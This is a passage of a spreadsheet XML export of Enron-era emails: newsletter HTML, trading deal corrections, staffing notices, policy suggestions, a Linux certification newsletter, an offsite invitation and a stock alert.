Symposium&lt;/b&gt; in Houston.  The symposium will address &lt;b&gt;supplying the_x000D_
North American market&lt;/b&gt; and bring us a &lt;b&gt;pipeline route update&lt;/b&gt;,_x000D_
among other topics.  _x000D_
&lt;p&gt;Keep in mind things are subject to change at a moment's notice._x000D_
Occasionally guests have to cancel or change time slots.  We'll continue_x000D_
to do our best to keep you updated on future interviews and events.  _x000D_
&lt;p&gt;&lt;b&gt;Be sure to watch our newscasts every business day - 9 a.m. to 5_x000D_
p.m. ET, at the top of each hour.&lt;/b&gt; _x000D_
&lt;!-- CONTENT END   --&gt;_x000D_
_x000D_
    &lt;/font&gt;&lt;/p&gt;&lt;/td&gt; _x000D_
   &lt;td width="50"&gt;&amp;nbsp;&lt;/td&gt; _x000D_
  &lt;/tr&gt; _x000D_
  &lt;tr&gt; _x000D_
    &lt;td&gt;&amp;nbsp;&lt;/td&gt; _x000D_
    &lt;td colspan="3"&gt;&lt;img_x000D_
src="http://www.energynewslive.com/content/email/graphics/signature.jpg"_x000D_
width="124" height="76" NOSEND="1"&gt; _x000D_
    &lt;td colspan="3"&gt;&amp;nbsp;&lt;/td&gt; _x000D_
  &lt;/tr&gt; _x000D_
  &lt;tr&gt; _x000D_
    &lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt; _x000D_
    &lt;td&gt;&lt;FONT face=verdana,arial,helvetica size=-1&gt;Jay Rickerts,_x000D_
EnergyNewsLive.com Anchor&lt;BR&gt;&lt;BR&gt;_x000D_
      &lt;b&gt;View today's Energy Wrap Video&lt;/b&gt;&lt;br&gt;_x000D_
      Windows Media Player: &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=dailyWrap&amp;format=WMP&amp;speed=56&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
56K&lt;/a&gt;  |  &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=dailyWrap&amp;format=WMP&amp;speed=100&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
100K&lt;/a&gt;  |  &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=dailyWrap&amp;format=WMP&amp;speed=300&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
300K&lt;/a&gt;_x000D_
      &lt;br&gt;_x000D_
      Real Player: &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=dailyWrap&amp;format=REAL&amp;speed=56&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
56K&lt;/a&gt;  |  &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=dailyWrap&amp;format=REAL&amp;speed=100&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
100K&lt;/a&gt;  |  &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=dailyWrap&amp;format=REAL&amp;speed=300&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
300K&lt;/a&gt;&lt;br&gt;_x000D_
      &lt;br&gt;_x000D_
      (Requires &lt;a_x000D_
href="http://www.microsoft.com/windows/mediaplayer/en/download/Win32IE4x_x000D_
86.asp"&gt;Windows Media Player&lt;/a&gt; or &lt;a href="http://www.real.com"&gt;Real_x000D_
Player&lt;/a&gt;)_x000D_
_x000D_
      &lt;br&gt;_x000D_
      &lt;br&gt; _x000D_
&lt;a href="http://www.energynewslive.com"&gt;Experience all that Williams_x000D_
Energy News Live has to offer!&lt;/a&gt;&lt;br&gt;&lt;br&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
If you are receiving this letter for the first time and wish to_x000D_
continue,&lt;br&gt; _x000D_
&lt;a href=mailto:join-enl-members-html@estutenws11.energy.williams.com&gt;_x000D_
subscribe now&lt;/a&gt;_x000D_
_x000D_
&lt;br&gt;&lt;br&gt; _x000D_
To stop receiving this letter, &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;acti_x000D_
on=unsubscribeDailyWrap&amp;type=H&amp;email=Mike.Grigsby@enron.com"&gt;_x000D_
unsubscribe now&lt;/a&gt; _x000D_
_x000D_
&lt;br&gt;&lt;br&gt; _x000D_
If you are having trouble receiving this e-mail, please &lt;a _x000D_
href=mailto:ecenter@energynewslive.com&gt;let us know&lt;/a&gt; or _x000D_
call&lt;br&gt; (800) WILLIAMS (800-945-5426) weekdays, 7am-7pm CST. _x000D_
&lt;br&gt;&lt;br&gt; _x000D_
Comments? Suggestions? &lt;a href=mailto:ecenter@energynewslive.com&gt;Let us _x000D_
know&lt;/a&gt; or _x000D_
call (800) WILLIAMS (800-945-5426) weekdays, 7am-7pm CST. _x000D_
&lt;br&gt;&lt;br&gt; _x000D_
      &lt;font size=-3&gt;Copyright 2001 Williams Energy News Live, LLC. All _x000D_
Rights Reserved.&lt;/font&gt;&lt;/font&gt; _x000D_
    &lt;/td&gt; _x000D_
  &lt;/tr&gt; _x000D_
&lt;/table&gt; _x000D_
&lt;/body&gt; _x000D_
&lt;/html&gt; _x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 01:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>langley</t>
  </si>
  <si>
    <t xml:space="preserve">pls print up on letterhead and format correctly for me to send out.  thanks.  _x000D_
df_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 14:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>whatever gillette.  i will be feeling all loose and relaxed while i am whooping it up at the grasshopper tonight.</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 06:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'debra.davidson@enron.com', 'kathryn.sheppard@enron.com', 'kathy.axford@enron.com'})</t>
  </si>
  <si>
    <t>Changes in Preschedule staff</t>
  </si>
  <si>
    <t>Mike Purcell is leaving our group to move to Volume management, effective _x000D_
following his vacation which is all next week._x000D_
_x000D_
I will be scheduling Mid C until a replacement is hired and trained._x000D_
_x000D_
Please contact me with questions regarding MidC schedules.</t>
  </si>
  <si>
    <t>Sat, 26 May 2001 01:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rbweis@dnai.com'})</t>
  </si>
  <si>
    <t>frozenset({'smutny@iepa.com', 'jeff.dasovich@enron.com'})</t>
  </si>
  <si>
    <t>Suggestion</t>
  </si>
  <si>
    <t>The fastest way for the Feds to fix the national super highway system to_x000D_
dirt path transition at the California border (in terms of physical capacity_x000D_
and regulatory schemes) is to FERC the PG&amp;E and SoCal backbone systems.  Let_x000D_
the CPUC reg gas from the SF and LA city gate.  FERC would get the high_x000D_
pressure lines from the border, which is the way it is in almost every other_x000D_
state in the lower 48. Integrate California in the national gas markets._x000D_
_x000D_
Repeal the Henshaw amendment, or encourage PG&amp;E/Sempra to file. I think_x000D_
sending pixs of Lynch and Hebert would be more than enough encouragement._x000D_
At least one of them is thinking of such a filing._x000D_
_x000D_
It would set off WW III in the California /DC dialogue and PC/ utility_x000D_
discussions._x000D_
_x000D_
_x000D_
Bob_x000D_
_x000D_
Ps.  In terms of bypass, it would result in a pretty level playing field to_x000D_
the city gate in terms of rate designs and operational rules.</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 07:47:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Do you know Laura Doll?</t>
  </si>
  <si>
    <t>Hey, Jean.  Man, who don't you know???  Anyway, I'm sorry to bug you, but I'd like to try to get a meeting with Ms Doll ASAP.  If there's anyway that we can manage that, I'd, of course, be eternally indebted._x000D_
 _x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ryall, Jean _x000D_
Sent: Monday, October 08, 2001 11:46 PM_x000D_
To: Steffes, James D._x000D_
Cc: Dasovich, Jeff_x000D_
Subject: RE: Do you know Laura Doll?_x000D_
_x000D_
_x000D_
Yes, I have known her for quite some time.  She is the one who recommended me to Korn Ferry for the job that I have at Enron.  I will be happy to make the introduction.  Shall I make arrangements for a meeting in Pebble Beach???  _x000D_
 _x000D_
I'll give her a call when you say the word...Jean_x000D_
_x000D_
-----Original Message----- _x000D_
From: Steffes, James D. _x000D_
Sent: Sun 10/7/2001 9:48 AM _x000D_
To: Ryall, Jean _x000D_
Cc: Dasovich, Jeff _x000D_
Subject: Do you know Laura Doll?_x000D_
_x000D_
_x000D_
Jean --_x000D_
 _x000D_
Laura Doll has been appointed head of the CA Power Authority.  Do you know her?  It would be good to have an introduction for Jeff Dasovich._x000D_
 _x000D_
Jim</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 00:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Report says New England needs more gas pipelines.html</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Hunter S Shively/HOU/ECT on 02/12/2001 _x000D_
08:21 AM ---------------------------_x000D_
_x000D_
_x000D_
"Hunter &amp; Jessica Shively" &lt;Hunter-Jessica@houston.rr.com&gt; on 02/11/2001 _x000D_
06:06:53 PM_x000D_
To: "Shively, Hunter" &lt;hunter.s.shively@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Report says New England needs more gas pipelines.html_x000D_
_x000D_
_x000D_
_x000D_
?</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 06:33:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Information Request</t>
  </si>
  <si>
    <t>Janel--_x000D_
_x000D_
No one on my team is really qualified.  _x000D_
 _x000D_
Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Guerrero, Janel _x000D_
Sent: Wednesday, August 08, 2001 1:44 PM_x000D_
To: Shapiro, Richard; Steffes, James D.; Robertson, Linda; Kaufman, Paul; Ryall, Jean; Montovano, Steve; Migden, Janine; Yoho, Lisa; Nord, Sue; Kingerski, Harry_x000D_
Subject: Information Request_x000D_
_x000D_
_x000D_
 _x000D_
As part of Public Affairs Global New Economy Initiative (GNEI), Margaret Allen has requested a comprehensive list of publications whose audiences are state and federal policymakers.  _x000D_
 _x000D_
For example, Roll Call, The Hill, National Review and Weekly Standard are a few of the magazines and newspapers whose readership includes the U.S. Congress.  _x000D_
 _x000D_
Part of the GNEI brand marketing initiative may include a certain level of advertising by Enron in these publications, and therefore it's important that we deliver to Margaret an adequate list to work from.  _x000D_
 _x000D_
Please identify someone on your team who will be responsible for pulling this list together and send me their names so that we can coordinate._x000D_
 _x000D_
In addition to Washington, DC you should focus on those states where Enron has a significant stake in the wholesale and retail energy business as well as states where policies are being debated that affect Enron's other commodities (broadband etc).  _x000D_
 _x000D_
I will need the name of your designee by Friday, August 10th _x000D_
 _x000D_
Margaret needs a final list by Friday, August 17th.  _x000D_
 _x000D_
Thanks!</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 00:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)</t>
  </si>
  <si>
    <t xml:space="preserve">Kate:_x000D_
_x000D_
Can you please modify that deal that you made the price $140 yesterday to _x000D_
make it for the 6th only?  The 7th is all at $150._x000D_
_x000D_
Thanks_x000D_
_x000D_
C_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 04/10/2001 _x000D_
09:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
04/10/2001 07:51 AM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)_x000D_
_x000D_
Chris,_x000D_
Good morning!  Hey, one thing I probably did not clarify to you yesterday on _x000D_
was that when the new deal ticket was set up for the $140 price strip (Deal _x000D_
#576468.1), the deal should only be in for (4/6/2001) according to APX's _x000D_
statement (not including 4/7/2001).  Therefore, the entire offpeak for your _x000D_
deal would be booked on Deal #572069.1 for the $150 price for 4/7/2001.  Let _x000D_
me know if you have any questions.  Thanks._x000D_
ajc_x000D_
_x000D_
---------------------- Forwarded by Audrey Cook/HOU/ECT on 04/10/2001 09:44 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
04/06/2001 01:27 PM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: APX - 4/6/2001_x000D_
_x000D_
Chris,_x000D_
One more quick thing on 4/6/2001- APX is showing 2 different prices for _x000D_
offpeak ($140 &amp; $150 - different MW per strip).  EPMI is showing $150 @ 12/MW _x000D_
per offpeak hours.  This difference amounts to a $144 difference (APX has _x000D_
lower invoice).  Can you verify?  Everything else is fine....talk to you next _x000D_
week.  Have a good weekend.  _x000D_
ajc_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 00:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carole.frank@enron.com'})</t>
  </si>
  <si>
    <t>Credit Report--3/7/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 03/08/2001 _x000D_
08:39 AM ---------------------------_x000D_
From: Veronica Espinoza/ENRON@enronXgate on 03/07/2001 09:09 AM_x000D_
To: Janie Aguayo/HOU/ECT@ECT, Diane Anderson/NA/Enron@Enron, Derek _x000D_
Bailey/Corp/Enron@ENRON, David Baumbach/HOU/ECT@ECT, Jean Bell/HOU/ECT@ECT, _x000D_
Patricia Boulanger/CAL/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Debbie R _x000D_
Brackett/HOU/ECT@ECT, William S Bradford/ENRON@enronXgate, Lesli _x000D_
Campbell/ENRON@enronXgate, Celeste Cisneros/NA/Enron@Enron, Sharon _x000D_
Crawford/CAL/ECT@ECT, Richard Deming/NA/Enron@Enron, Russell _x000D_
Diamond/ENRON@enronXgate, Cindy Feldman/CAL/ECT@ECT, Darron C _x000D_
Giron/HOU/ECT@ECT, Veronica Gonzalez/ENRON@enronXgate, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Walter Guidroz/ENRON@enronXgate, Larry Joe _x000D_
Hunter/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON, Nidia Mendoza/ENRON@enronXgate, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Tom Moran/ENRON@enronXgate, Leslie _x000D_
Reeves/HOU/ECT@ECT, Tanya Rohauer/ENRON@enronXgate, Dianne Seib/CAL/ECT@ECT, _x000D_
Linda Sietzema/CAL/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Ellen _x000D_
Wallumrod/NA/Enron@ENRON, Melinda Whalen/CAL/ECT@ECT, Tiffany _x000D_
Williams/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Credit Report--3/7/01_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 00:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'public.relations@enron.com'})</t>
  </si>
  <si>
    <t>Replay of All-Employee Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">So you missed the All-Employee Meeting?_x000D_
No problem. _x000D_
_x000D_
 You can view the Enron update and Q&amp;A by Ken, Jeff and Joe on Oct. 3 by _x000D_
going to IPTV.enron.com and clicking on Special Events.  The meeting will run _x000D_
every two hours beginning at 8 a.m. today and will be available through Oct. _x000D_
31. _x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 07:08:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: EOL and Clickpaper Approvals for 10-15-01</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lebrocq, Wendi  _x000D_
Sent:	Monday, October 15, 2001 6:02 PM_x000D_
To:	Lambert, Karen; Jones, Tana; Schott, Samuel; Brackett, Debbie R.; Clark, Cynthia; Enron Europe Global CounterParty,; Sever, Stephanie; Moran, Tom; Clark, Claudia; Bradford, William S.; Lees, Lisa; Fayett, Juana; Morse, Jana; Le, Trang; Maley, Paul; O'day, Karen; Rohauer, Tanya; Lombardi, Kelly; Lindsay, Brian; EOL Call Center; Hare, Bill D.; Heffernan, Amy; Lafuze, Molly; Clark, Danny; Panus, Stephanie; Mandola, Teresa; Ebow, Amber; Coleman, Tandra; Campbell, Lesli; Lebrocq, Wendi; Taylor, Mark E (Legal); Lauer, Kara; Banner, Kimberly; Mcquade, Jennifer; George, Fraisy; Guillory, Michael; Rajaram, Aparna; Monterrey, Maribel; Lebeau, Maria; Escamilla, Albert; Curry, Ken_x000D_
Subject:	EOL and Clickpaper Approvals for 10-15-01_x000D_
_x000D_
_x000D_
Please see attached._x000D_
_x000D_
 _x000D_
Regards,_x000D_
_x000D_
Wendi LeBrocq_x000D_
3-3835</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 12:14:59 -0800 (PST)</t>
  </si>
  <si>
    <t>are you there?</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 02:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shari.mao@enron.com'})</t>
  </si>
  <si>
    <t>Re: May Activity Survey</t>
  </si>
  <si>
    <t>Thanks, Daren,_x000D_
These are the only stats that we need for now._x000D_
Shari</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 02:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Are you inviting me or just asking if the boat will make it on time?  If you _x000D_
invitingme I'd love to come but....I have to be back here the day after _x000D_
Christmas.  And Rock's off that week so there's no chance I could take off.   _x000D_
I'll just have to stay here all by myself.  _x000D_
_x000D_
If we go to lunch today, it'll have to be kind of quick.  I have my meeting _x000D_
with the analyst people at 11:30 and another meeting at 1:00.  _x000D_
_x000D_
Bye._x000D_
RR_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gabriel Monroy_x000D_
12/15/2000 09:31 AM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
It was hard to wake up after that dinner though.  Was it hard for you?  I _x000D_
feel like my whole body is swollen. _x000D_
My boss is sick again today.  Now, the outcome of that is really uncertain. _x000D_
He will either delay the whole due dilligence  process or maybe he will want _x000D_
to catch up and have us work even harder during the weekend.  _x000D_
_x000D_
PS if you catch the cruise in New Orleans  after Christmas, do you think _x000D_
you'll make it to Veracruz for New Year's Eve._x000D_
_x000D_
Gabriel_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 16:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ryan.seleznov@enron.com'})</t>
  </si>
  <si>
    <t>FMLA Certification</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
---------------------------------------------------------------------------------------------------------_x000D_
_x000D_
Michelle Cash_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3823_x000D_
Houston, Texas  77002_x000D_
(713) 853-6401_x000D_
michelle.cash@enron.com_x000D_
_x000D_
This message may contain confidential information that is protected by the attorney-client and/or work product privileges._x000D_
----- Forwarded by Michelle Cash/HOU/ECT on 05/21/2001 01:09 PM -----_x000D_
_x000D_
_x000D_
	Valeria A Hope 05/21/2001 11:42 AM 	   To: Michelle Cash/HOU/ECT@ECT  cc:   Subject: FMLA Certification	_x000D_
_x000D_
_x000D_
Attached is the Enron FMLA Certification form; it was revised from the DOL document to include the Enron logo._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 13 Jan 2000 03:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'slewis2@enron.com'})</t>
  </si>
  <si>
    <t>Re: ENROLLMENT CONFIRMATION/Impact/ECT</t>
  </si>
  <si>
    <t>Susan,_x000D_
_x000D_
 I received an enrollment confirmation for a class that I did not sign up _x000D_
for.  Is there some mistake?_x000D_
_x000D_
Phillip Allen</t>
  </si>
  <si>
    <t>Thu, 27 Apr 2000 00:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vincek@leland.stanford.edu'})</t>
  </si>
  <si>
    <t>Getting Linux-certified</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/27/2000=_x000D_
=20_x000D_
07:26 AM ---------------------------_x000D_
_x000D_
_x000D_
"NW on Linux" &lt;Linux@bdcimail.com&gt; on 04/27/2000 04:57:17 AM_x000D_
Please respond to "Linux Help" &lt;NWReplies@bellevue.com&gt;_x000D_
To: &lt;vkamins@enron.com&gt;_x000D_
cc: =20_x000D_
Subject: Getting Linux-certified_x000D_
_x000D_
_x000D_
NETWORK WORLD FUSION FOCUS: PHIL HOCHMUTH_x000D_
on LINUX_x000D_
Today's focus: Getting Linux-certified_x000D_
04/26/00_x000D_
_x000D_
Dear Wincenty Kaminski,_x000D_
_x000D_
Subscribe to the "Whitepapers Download"=20_x000D_
newsletter from Network World!!_x000D_
Keep up-to-date with summaries and links to the latest vendor-sponsored_x000D_
whitepapers on Network World Fusion._x000D_
Subscribe to Whitepapers Download at_x000D_
http://www.nwfusion.com/go/wppromo.html_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
_x000D_
Today's focus: Getting Linux-certified_x000D_
---------------------------------------------_x000D_
By Phil Hochmuth_x000D_
_x000D_
Most networking professionals are probably familiar with certification_x000D_
programs for various operating systems and technologies. With more_x000D_
enterprises using Linux, several companies have started to offer Linux_x000D_
certification and training._x000D_
_x000D_
One of the most popular programs is run by - not surprisingly - the top_x000D_
Linux company, Red Hat. The leading Linux distributor offers training_x000D_
and certification of its product for network professionals in a program_x000D_
similar to system-specific certifications such as Certified Novell_x000D_
Engineer and Microsoft Certified Software Engineer._x000D_
_x000D_
Red Hat=01,s Certified Engineer (RHCE) program is a five-day course that_x000D_
consists of four one-day labs followed by a certification test taken on_x000D_
the fifth day. Prerequisites for the course include knowledge of basic_x000D_
Intel- and Intel clone-based hardware architecture, familiarity with_x000D_
basic Unix file structure and shell programming, TCP/IP networking_x000D_
skills and network administration experience. The test can also be_x000D_
taken on its own, without the four days of labs._x000D_
_x000D_
Unlike the widely accessible Microsoft or Novell certification programs,_x000D_
RHCE courses and tests are only available at Red Hat training_x000D_
facilities in Durham, N.C., Portland, Ore., San Francisco and Santa_x000D_
Clara. The course costs $2,498; the test can be taken alone for $749._x000D_
_x000D_
Red Hat certification can be valuable for companies investing heavily_x000D_
in Red Hat Linux as an alternative network operating system, or for IT_x000D_
professionals looking for a certification feather in their caps._x000D_
However, the program has been criticized by some for its poor_x000D_
accessibility and high cost. The single-distribution focus of the_x000D_
training has also been at issue with some Linux users looking for_x000D_
certification options._x000D_
_x000D_
For Linux certification and training that isn=01,t tied to any specific_x000D_
distribution, the Linux Professional Institute (LPI) has less expensive_x000D_
certification test offerings._x000D_
_x000D_
LPI offers basic, advanced and expert levels of Linux certification._x000D_
The beginning level certifies users beyond a basic help desk or_x000D_
power-user level of knowledge. Prerequisites for this course are equal_x000D_
to the Red Hat program. The second level requires more in-depth study_x000D_
for people looking for a system administrator=01,s level of certification._x000D_
The third level is for certification in more advanced and specialized_x000D_
areas, such as database server administration or kernel and device_x000D_
driver development. Each level involves two tests, which cost $100 each_x000D_
to take. Currently, only the requirements for the first level of the_x000D_
LPI program have been finalized; requirements for the second and third_x000D_
levels could change in the near future. LPI=01,s tests are administered_x000D_
through Virtual University Enterprises=01, 1,700 test centers worldwide._x000D_
Among LPI=01,s backers are Caldera, SuSE, Linuxcare, IBM and TurboLinux._x000D_
_x000D_
Another option for distribution-neutral Linux certification is the Sair_x000D_
GNU and Linux Certification program. Similar to the LPI model, the_x000D_
program offers three levels of certification: Linux Certified_x000D_
Administrator (LCA) for basic administrative-level certification; Linux_x000D_
Certified Engineer (LCE) for advanced system managers; and Master Linux_x000D_
Certified Engineer (MLCE) for senior systems managers. Four tests are_x000D_
required for each level of certification, with LCA, LCE and MLCE_x000D_
programs currently available. Certification tests cost $99 each and can_x000D_
be taken at 2,000 Sylvan Prometric testing centers worldwide._x000D_
_x000D_
To contact Phil Hochmuth:_x000D_
-------------------------_x000D_
Phil Hochmuth is a writer and researcher for Network World, and_x000D_
a former systems integrator. You can reach him at_x000D_
mailto:phochmut@nww.com._x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
FOR RELATED LINKS -- Click here for Network World's home page:_x000D_
http://www.nwfusion.com_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
Find out more about Red Hat, LPI and SAIR certification programs:_x000D_
_x000D_
Red Hat Training:_x000D_
http://www.redhat.com/services/training/training.html_x000D_
_x000D_
LPI:_x000D_
http://www.LPI.org_x000D_
_x000D_
Linux Certification:_x000D_
http://www.linuxcertification.com_x000D_
_x000D_
Find the testing and certification resources for Linux and other_x000D_
technologies:_x000D_
_x000D_
Virtual University:_x000D_
http://www.vue.com_x000D_
_x000D_
Linux nerds:_x000D_
http://www.linuxnerds.com_x000D_
_x000D_
SAGE Certification:_x000D_
http://www.usenix.org/sage/cert_x000D_
_x000D_
Archive of Network World Fusion Focus on Linux newsletters:_x000D_
http://www.nwfusion.com/newsletters/linux/_x000D_
_x000D_
_x000D_
May We Send You a Free Print Subscription?_x000D_
You've got the technology snapshot of your choice delivered at your_x000D_
fingertips each day. Now, extend your knowledge by receiving 51 FREE_x000D_
issues to our print publication. Apply today at_x000D_
http://www.nwwsubscribe.com/nl_x000D_
_x000D_
*********************************************************_x000D_
Subscription Services_x000D_
_x000D_
To subscribe or unsubscribe to any Network World e-mail newsletters,go_x000D_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_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 05:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'ozzie.pagan@enron.com', 'c.thompson@enron.com', 'brian.redmond@enron.com', 'rogers.herndon@enron.com', 'stephen.douglas@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'dana.davis@enron.com', 'sally.beck@enron.com', 'edward.baughman@enron.com', 'doug.gilbert-smith@enron.com', 'jeff.donahue@enron.com', 'scott.neal@enron.com', 'beth.perlman@enron.com', 'scott.tholan@enron.com', 'fred.lagrasta@enron.com', 'david.oxley@enron.com', 'laura.luce@enron.com', 'mark.haedicke@enron.com', 'bruce.sukaly@enron.com', 'jonathan.mckay@enron.com', 'jean.mrha@enron.com', 'mike.swerzbin@enron.com', 'phillip.allen@enron.com', 'michael.miller@enron.com', 'thomas.martin@enron.com', 'jeffery.ader@enron.com', 'christopher.calger@enron.com', 'max.yzaguirre@enron.com', 'james.steffes@enron.com', 'hunter.shively@enron.com', 'john.zufferli@enron.com', 'w.duran@enron.com', 'paul.devries@enron.com', 'rob.milnthorp@enron.com', 'joseph.deffner@enron.com', 'eric.ledain@enron.com', 'greg.wolfe@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'derek.davies@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>2000 ENA Offsite</t>
  </si>
  <si>
    <t>Guys, attached you will find a preliminary agenda for the 2000 ENA Offsite.  _x000D_
As leaders of the organization, you have been invited to participate in a two _x000D_
day offsite where business 2001 objectives and strategies for ENA will be _x000D_
discussed.  It is scheduled to occur December 14th and 15th at the Venetian _x000D_
in Las Vegas._x000D_
_x000D_
This is the forum to ensure that your point of view and ideas can be heard _x000D_
and incorporated into our plans and iniatives as such I would encourage _x000D_
everyone to attend and to stay for the entire period.  In particular, we _x000D_
would like everyone to stay over Friday night and leave Saturday morning._x000D_
_x000D_
ENA public relations (Dorie) will manage all the logistics including air fare._x000D_
_x000D_
Final invitations, details and agenda will follow shortly._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Dave and John</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 09:09:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alerts@alerts.equityalert.com'})</t>
  </si>
  <si>
    <t>Your News Alert for QCOM</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09[IMAGE]=09 =09[IMAGE]=09[IMAGE]=09_x000D_
_x000D_
_x000D_
             [IMAGE] [IMAGE]   [IMAGE] [IMAGE] Upgrades  [IMAGE] DownGrades=_x000D_
  [IMAGE] Coverage Initiated  [IMAGE] Stock Splits  [IMAGE] Buybacks  [IMAG=_x000D_
E] Pos Pre-Announce  [IMAGE] Neg Pre-Announce     [IMAGE]   [IMAGE]   [IMAG=_x000D_
E]  [IMAGE]  [IMAGE] Unsubscribe  [IMAGE] Update my Membership / Profile  [=_x000D_
IMAGE] Forgot Username / Password  [IMAGE] Add / Edit Alerts  [IMAGE] View =_x000D_
My Alerts   [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE]  [IMAGE]    [IMAGE] [=_x000D_
IMAGE] [IMAGE] =09  As requested, your News Alert for QCOM  follows from Eq=_x000D_
uityAlert.com.     Form 144: Filing to Sell 200 Shares of QUALCOMM INC (QCO=_x000D_
M)   Jan 16, 2002 (Vickers Stock Research via COMTEX) --   Document Process=_x000D_
